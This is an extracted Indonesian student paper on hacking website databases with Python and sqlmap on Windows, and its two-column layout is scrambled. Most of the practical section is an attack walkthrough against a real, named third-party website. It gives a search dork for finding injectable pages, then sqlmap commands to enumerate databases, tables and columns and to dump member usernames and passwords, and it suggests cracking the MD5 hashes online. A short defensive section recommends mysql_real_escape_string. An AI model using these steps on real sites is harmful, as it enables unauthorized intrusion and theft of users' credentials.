See

discussions, stats, and author profiles for this publication at: https://www.researchgate.net/publication/303372599

Hack Database Website Menggunakan Python

dan Sqlmap Pada Windows

Article · May 2016

CITATIONS READS

0 9,521

2 authors, including:

Tanti Siti Nurjanah

UIN Sunan Gunung Djati Bandung
2 PUBLICATIONS 0 CITATIONS

SEE PROFILE

All content following this page was uploaded by Tanti Siti Nurjanah on 21 May 2016.

The user has requested enhancement of the downloaded file.

Hack Database Website Menggunakan Python dan Sqlmap Pada Windows

Tanti Siti Nurjanah , Entik Insanudin

1137050210
Jurusan Teknik Informatika , UIN Sunan Gunung Djati Bandung
tanti.sn@gmail.com , insan@if.uinsgd.ac.id

Abstrak teknologi yang semakin pesat kini cara

Kemudahan mengakses sebuah
informasi dan komunikasi melalui internet,
hal ini memungkinkan masyarakat dapat
menyimpan semua data yang dimilikinya
kedalam sebuah website yang ada
diinternet. Dimana internet merupakan
seluruh jaringan komputer yang saling
terhubung menggunakan standar sistem
global Transmission Control
Protocol/Internet Protocol Suite (TCP/IP)
sebagai protokol pertukaran paket (packet
switching communication protocol) untuk
melayani miliaran pengguna di seluruh
dunia.
Dengan demikian hal ini dapat
memicu sebuah kesempatan bagi orang
orang yang biasa disebut dengan hacker
dapat dengan mudah mencuri data data
tersebut salah satunya dengan teknik
deface website dengan menggunakan
python dan sqlmap di windows.
Dimana python adalah bahasa
pemrograman yang diciptakan oleh Guido
van Rossum dan popular sebagai bahasa
skripting dan pemrograman Web.
Kata Kunci : Internet , Hacking , Python
1. PENDAHULUAN
1.1 Latar Belakang
Kehidupan manusia semakin hari
semakin berkembang baik dari segi pola
berpikir atau dari segi tatacara
berkomunikasi. Dengan kemajuan
berkomunikasi antar sesama dapat
dilakukan melalui internet. Internet
(kependekan dari interconnection-
networking) adalah seluruh jaringan
komputer yang saling terhubung
menggunakan standar sistem global
Transmission Control Protocol/Internet
Protocol Suite (TCP/IP) sebagai protokol
pertukaran paket (packet switching
communication protocol) untuk melayani
miliaran pengguna di seluruh dunia.
Internet sudah menjadi sebuah istilah yang
tidak asing lagi di kalangan masyarakat,
karena melalui internet masyarakat dapat
mendapatkan berbagai informasi melulai
berbagai situs web. Situs web (bahasa
Inggris: website) adalah suatu halaman
web yang saling berhubungan yang
umumnya berada pada peladen yang sama
berisikan kumpulan informasi yang
disediakan secara perorangan, kelompok,
atauorganisasi.Sebuah situs web biasanya
ditempatkan setidaknya pada sebuah server
web yang dapat diakses melalui jaringan
seperti Internet, ataupun jaringan wilayah
lokal (LAN) melalui alamat Internet yang
dikenali sebagai URL.
Kemudahan mengakses sebuah
informasi dan komunikasi melalui internet
, hal ini memungkinkan masyarakat dapat
menyimpan semua data yang dimilikinya
kedalam sebuah website yang ada

1|By Tanti Siti Nurjanah (1137050210)

diinternet. Dengan demikian hal ini dapat
memicu sebuah kesempatan bagi orang
orang yang biasa disebut dengan hacker
dapat dengan mudah mencuri data data
tersebut salah satunya dengan teknik
Deface Website dengan Menggunakan
Python dan SQLmap di Windows.
1.2 Rumusan Masalah
 Bagaimana cara mengetahui sebuah
celah pada sebuah website?
 Bagaimana cara mendapatkan sebuah
database sebuah website?
 Bagaimana cara menganggunginya?
1.3 Tujuan
 Mengetahui cara mengetahui celah
sebuah website
 Mengetahui cara mendapatkan
database sebuah website
 Mengatahui bagaimana cara
menanggunanginya
2. LANDASAN TEORI
2.1 Pengertian Internet
Internet (kependekan dari
interconnection-networking) adalah
seluruh jaringan komputer yang saling
terhubung menggunakan standar sistem
global Transmission Control
Protocol/Internet Protocol Suite (TCP/IP)
sebagai protokol pertukaran paket (packet
switching communication protocol) untuk
melayani miliaran pengguna di seluruh
dunia. Internet sudah menjadi sebuah
istilah yang tidak asing lagi di kalangan
masyarakat, karena melalui internet
masyarakat dapat mendapatkan berbagai
informasi melulai berbagai situs web.
2|By Tanti Siti Nurjanah (1137050210)
2.2 Pengertian Website
Situs web (bahasa Inggris: website)
adalah suatu halaman web yang saling
berhubungan yang umumnya berada pada
peladen yang sama berisikan kumpulan
informasi yang disediakan secara
perorangan, kelompok,
atauorganisasi.Sebuah situs web biasanya
ditempatkan setidaknya pada sebuah
server web yang dapat diakses melalui
jaringan seperti Internet, ataupun jaringan
wilayah lokal (LAN) melalui alamat
Internet yang dikenali sebagai URL.
2.3 Pengertian Deface
Deface adalah kegiatan hacking
yang mengubah tampilan sebuah website.
Sedangkan cara yang digunakan bisa
bermacam-macam seperti SQL Injection,
mencari password, dan cara lainnya.
Deface adalah Aktifitas yang mengotori,
“menodai”, merubah inti dari isi halaman
suatu website dengan tulisan, gambar,
ataupun link yang membuat suatu link
menjadi melenceng dari perintah yang
kita buat. Sedangkan pengertian dari web
deface adalah melakukan perubahan pada
halaman web depan pada situs-situs
tertentu, dilakukan oleh para hacker atau
cracker untuk mengganggu informasi
yang dimunculkan pada halaman situs
yang dimaksud. Pengertian mudahnya,
web deface adalah menambahkan gambar,
tulisan ke suatu web milik orang lain
tanpa sepengetahuan adminnya.
Defacing adalah merupakan bagian
dari kegiatan hacking web atau program
application, yang menfokuskan target
operasi pada perubahan tampilan dan
konfigurasi fisik dari web atau program
aplikasi tanpa melalui source code
program tersebut. Sedangkan deface itu
sendiri adalah hasil akhir dari kegiatan
cracking. Tekniknya adalah dengan
membaca source codenya, terus ngganti
image dan editing html tag.
2.4 Pengertian Phyton
Python adalah bahasa pemrograman
yang diciptakan oleh Guido van Rossum
dan popular sebagai bahasa skripting dan
pemrograman Web. Merujuk pengertian
dari wikipedia, Python adalah bahasa
pemrograman interpretatif multiguna
dengan filosofi perancangan yang
berfokus pada tingkat keterbacaan kode.
Python diklaim sebagai bahasa yang
menggabungkan kapabilitas, kemampuan,
dengan sintaksis kode yang sangat jelas,
dan dilengkapi dengan fungsionalitas
pustaka standar yang besar serta
komprehensif. Python mendukung multi
paradigma pemrograman, utamanya;
namun tidak dibatasi; pada pemrograman
berorientasi objek, pemrograman
imperatif, dan pemrograman fungsional.
Salah satu fitur yang tersedia pada python
adalah sebagai bahasa pemrograman
dinamis yang dilengkapi dengan
manajemen memori otomatis. Seperti
halnya pada bahasa pemrograman dinamis
lainnya, python umumnya digunakan
sebagai bahasa skrip meski pada
praktiknya penggunaan bahasa ini lebih
luas mencakup konteks pemanfaatan yang
umumnya tidak dilakukan dengan
menggunakan bahasa skrip. Python dapat
digunakan untuk berbagai keperluan
pengembangan perangkat lunak dan dapat
berjalan di berbagai platform sistem
operasi. Python merupakan salah satu
contoh bahasa tingkat tinggi. Contoh lain
bahasa tinggat tinggi adalah pascal, c++,
perl,java, dan sebagainya.
3|By Tanti Siti Nurjanah (1137050210)
Sedangkan bahasa tingkat rendah
merupakan bahasa mesin atau bahasa
assembly. Secara sederhana. sebuah
komputer hanya dapat mengeksekusi
program yang ditulis dalam berrtuk
bahasa mesin. Oleh karena itu. jika suatu
program ditulis dalam bentuk bahasa
tinght tinggi. maka program tersebut harus
diproses dulu sebelum bisa dijalanlon
dalam komputer. Hal ini merupakan salah
satu kekurangan bahasa tingkat tinggi yang
memerlukan waktu untuk memproses
suatu program sebelum program tersebut
dijalankan. Akan tetapi, bahasa tingkat
tinggi mempunyai banyak sekali
keuntungan. Bahasa tinglrat tinggi mudah
dipelajari. mudah ditulis. mudah dibaca.
dan tentu saia mudah dicari kesalahannya.
Bahasa tingkat tinggi juga mudah diubah
portabel untuk disesuaikan dengan mesin
yang menjalankannya. Hal ini berbeda
dengan bahasa mesin yang hanya dapat
digunakan untuk mesin tersebut. Dengan
berbagai kelebihan ini. maka banyak
aplikasi ditulis menggunakan bahasa
tinflrat tinggi. Proses mengubah dari
bentuk bahasa tingkat tinggi ke tingkat
rendah dalam bahasa pemrograman ada
rkra tipe.
Yakni interpreter dan compiler.
interpreter membaca program berbahasa
tingkat tinggi kemudian mengeksekusi
program tersebut. Hal ini berarti
interpreter melakukan apa yang dikatakan
dalam program tersebut. Dapat dikatakan.
interpreter membaca per baris kemudian
mengekselrusinya.
2.5 Pengertian SQLmap

SQLMAP adalah penetrasi open

source pengujian alat yang
mengotomatisasi proses mendeteksi dan
mengeksploitasi kelemahan SQL injection
dan mengambil alih server database.

3. PEMBAHASAN
3.1 Cara hack database website
menggungan python dan sqlmap

Untuk melakukan deface website Gambar 3 Proses Akhir Instalasi Python

menggunakan python dan sqlmap makan
tools yang harus dipersiapkan antara lain : Cek pada cmd apakah python sudah
terinstal atau belum yaitu dengan
 Python mengetikan python
 Sqlmap
 Cmd

Instal python yang telah diunduh hingga

proses path pada system.

Gambar 4 Python Sudah Terinstal

Setelah menginstal semua tools diatas

Gambar 1 Mentahan Python
maka hal yang pertama kali harus
dipersiapkan yaitu dengan menyiapkan
target website yang akan di deface. Cara
mengetahui target website yang akan
dideface yaitu dengan cara mengetikan
“products.php?cat=” di search engine .

Gambar 5 Tampilan pencarian target

Gambar 2 Proses Awal Instalasi Python

4|By Tanti Siti Nurjanah (1137050210)

Pilih salah satu website misalnya dan ketikan sqlmap.py –u (alamat target) --
http://neutralposture.com/_site/products.ph dbs
p?cat=04 tambahkan tanda “ „ “ diakhir
http://neutralposture.com/_site/products.ph Contoh
p?cat=04‟ . Setelah itu coba cek jika C:\Users\tanti\Desktop\sqlmap>s
halaman pertama sebelum ditambahkan „ qlmap.py –u
dengan halaman setelah ditambahkan „ http://neutralposture.com/_site
/products.php?cat=04 --dbs
berbeda maka web tersebut dapat di
deface.

Gambar 2 Tampilan Website sebelum ditambahkan ‘

Gambar 6 Hasil Scanning Database

Gambar 3 Tampilan Website sesudah ditambahkan ‘ Setelah melakukan scanning

Setelah target sudah ditentukan database maka selanjutnya kita lakukan
maka selajutnya kita lakukan scaning scanning tables dengan cara sqlmap.py –u
database dengan cara buka cmd lalu masuk (alamat target) –D (nama database) --
ke directory sqlmap yang sudah diekstrak tables

C:\Users\tanti\Desktop\sqlmap>s
qlmap.py –u
http://neutralposture.com/_site
/products.php?cat=04 –D
872128_npweb --tables

5|By Tanti Siti Nurjanah (1137050210)


Gambar 7 Hasil Scanning tables
Setelah mendapatkan daftar table
yang ada pada database kita dapat melihat
atribut yang ada dalam table tersebut
contohnya pilih salah satu table dengan
cara mengetikan sqlmap.py –u (alamat
target) –D (nama database) –T (nama
table) –column . Contoh
C:\Users\tanti\Desktop\sqlmap>s
qlmap.py –u
http://neutralposture.com/_site
/products.php?cat=04 –D
872128_npweb –T member --column
6|By Tanti Siti Nurjanah (1137050210)
Gambar 8 Hasil column table member
Untuk mengetahui isi dari tabel tersebut
maka kita bisa melakukan dump dengan
cara sqlmap.py –u (alamat target) –D
(nama database) –T (nama table) –C (nama
field) –dump. Contoh
C:\Users\tanti\Desktop\sqlmap>s
qlmap.py –u
http://neutralposture.com/_site
/products.php?cat=04 –D
872128_npweb –T member –C
username, password --dump
Gambar 9 Hasil Field tabel member
Dari hasil tersebut kita dapat mengetahui
isi keseluruhan database dari sebuah
website. Jika mendapatkan password yang
di enkripsi menggunakan md5 kita dapat
mendeskripsinya melalui salah satu web
yang dapat mendeskripsi md5
Gambar 10 Deskripsi md5 di salah satu website online
 3.2 Cara menanggulangi agar database databasenya bisa menggunakan search
website tidak terkena injection engine dengan mengetikan
“products.php?cat=” lalu tambahkan
Pada dasarnya , SQL Injection tanda „
adalah metode yang digunakan terhadap
 Cara mengamankan sebuah website
situs dan aplikasi untuk mendapatkan
agar tidak bisa di injection yaitu bisa
akses ke situs web atau aplikasi data,
menggunakan
disimpan dalam database SQL . SQL
mysql_real_escape_srting() dan
Injection digunakan untuk mendapatkan
mysql_query()
akses ke informasi database (atau seluruh
perusahaan ) , untuk menghancurkan
3.2. Saran
informasi database , atau untuk
Adapun saran–saran yang dapat
memanipulasi informasi database ini . Ini
dikembangkan dari cara hack database
adalah metode yang digunakan untuk
website dan cara mangamankannya yaitu:
mengeksploitasi kerentanan keamanan
 Gunakan enkripsi dalam penyimpanan
dari aplikasi atau situs web . Hal untuk
sebuah file database
menganggulanginya yaitu :
 Uji setiap query yang dibuat dalam
 Gunakan mysql_real_escape_string pembuatan sebuah website agar
Fungsi ini PHP lolos karakter ddapat meminimaliris tingkat celah
khusus untuk digunakan dalam untuk para hacker
query SQL dan melindungi Anda
dari serangan .Permintaan sekarang
akan terlihat seperti ini : 5. DAFTAR PUSTAKA
<?
$q = "SELECT `id` FROM `users` Utami Ema,dkk. 2004. Logika ALgoritma
WHERE `username`= ' " dan Implementasinya Dalam
.mysql_real_escape_string( Python di GNU/LINUX.
$_GET['username'] ). " ' AND Yogyakarta: ANDI
`password`= ' "
.mysql_real_escape_string(
$_GET['password'] ). " ' "; Zam Efvy . 2011 . Buku Sakti Hacker
.Jakarta : Mediakita
?>
 Gunakan mysql_query ( ) http://blazterzt-
error.blogspot.co.id/2012/12/deface-sqli-
dengan-python.html

4. PENUTUP http://www.onofile.net/2013/08/cara-
ampuh-hack-website-terbaru-2013.html
4.1 Kesimpulan
 Hack database sebuah website di
windows dapat menggunakan tools
python dan sqlmap
 Untuk mendapatkan target sebuah web
yang akan dideface ataupun di hack

7|By Tanti Siti Nurjanah (1137050210)

View publication stats